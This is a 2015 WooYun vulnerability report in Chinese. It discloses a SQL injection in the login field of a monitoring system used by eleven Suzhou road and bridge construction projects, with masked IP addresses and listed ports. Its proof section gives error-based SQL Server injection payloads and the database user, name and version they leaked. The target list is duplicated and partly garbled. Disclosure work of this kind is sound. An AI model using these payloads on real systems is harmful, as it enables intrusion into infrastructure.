多个国家工控系统高危SQL注入漏洞（影响11个系统）

发表于 2015年07月23日
WooYun漏洞库

漏洞概要

缺陷编号：WooYun-2015-0127734

漏洞标题：多个国家工控系统高危SQL注入漏洞（影响11个系统）

相关厂商：cncert国家互联网应急中心

漏洞作者：路人甲

提交时间：2015-07-23 19:15

公开时间：2015-09-07 16:10

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签：

漏洞详情

披露状态：

2015-07-23: 细节已通知厂商并且等待厂商处理中
2015-07-24: 厂商已经确认，细节仅向厂商公开
2015-08-03: 细节向核心白帽子及相关领域专家公开
2015-08-13: 细节向普通白帽子公开
2015-08-23: 细节向实习白帽子公开
2015-09-07: 细节向公众公开

简要描述：

多个国家工控系统高危SQL注入漏洞（影响11个系统）

详细说明：

一共11处工控系统不同的端口加以区分均为同一套系统

吴中打到东段暨南湖路快速路工程：**.**.**.**:80815赌咒时吴中区西山岛出入通道扩建工程：**.**.**.**:8086苏虞张公路改扩建北段工程：**.**.**.**:8080312国道苏州段分流线工程（中环以西段）：**.**.**.**:8083苏州市西环高架南延工程：**.**.**.**:8084七浦塘拓浚整治工程（高等级公路桥梁工程）：**.**.**.**:8202/西环快速路北延新区互通节点工程：**.**.**.**:8087吴淞江大道跨吴淞江大桥工程：**.**.**.**:8088相城区聚金路南延工程（312国道-济学路段）：**.**.**.**:8201/苏虞张公路改扩建南段工程：**.**.**.**:8081312国道苏州段分流线工程：**.**.**.**:8082

吴中打到东段暨南湖路快速路工程：**.**.**.**:80815赌咒时吴中区西山岛出入通道扩建工程：**.**.**.**:8086苏虞张公路改扩建北段工程：**.**.**.**:8080312国道苏州段分流线工程（中环以西段）：**.**.**.**:8083苏州市西环高架南延工程：**.**.**.**:8084七浦塘拓浚整治工程（高等级公路桥梁工程）：**.**.**.**:8202/西环快速路北延新区互通节点工程：**.**.**.**:8087吴淞江大道跨吴淞江大桥工程：**.**.**.**:8088相城区聚金路南延工程（312国道-济学路段）：**.**.**.**:8201/苏虞张公路改扩建南段工程：**.**.**.**:8081312国道苏州段分流线工程：**.**.**.**:8082

漏洞证明：

登陆处用户名处未过滤，导致注入以苏虞张公路改扩建北段工程：**.**.**.**:8080 为例

user：#poc

admin' and 1=convert(int,user) --

1	admin' and 1=convert(int,user) --

#result

gxjt

gxjt

db_name#poc

admin' and db_name>0 --

1	admin' and db_name>0 --

#result

wep

wep

version:#poc

admin' and @@version>0 --

1	admin' and @@version>0 --

#result

'Microsoft SQL Server 2008 R2 (SP2) - 10.50.4042.0 (X64)<br>
Mar 26 2015 21:18:04<br>
Copyright (c) Microsoft Corporation<br>
Enterprise Edition (64-bit) on Windows NT 6.1 <X64> (Build 7601: Service Pack 1)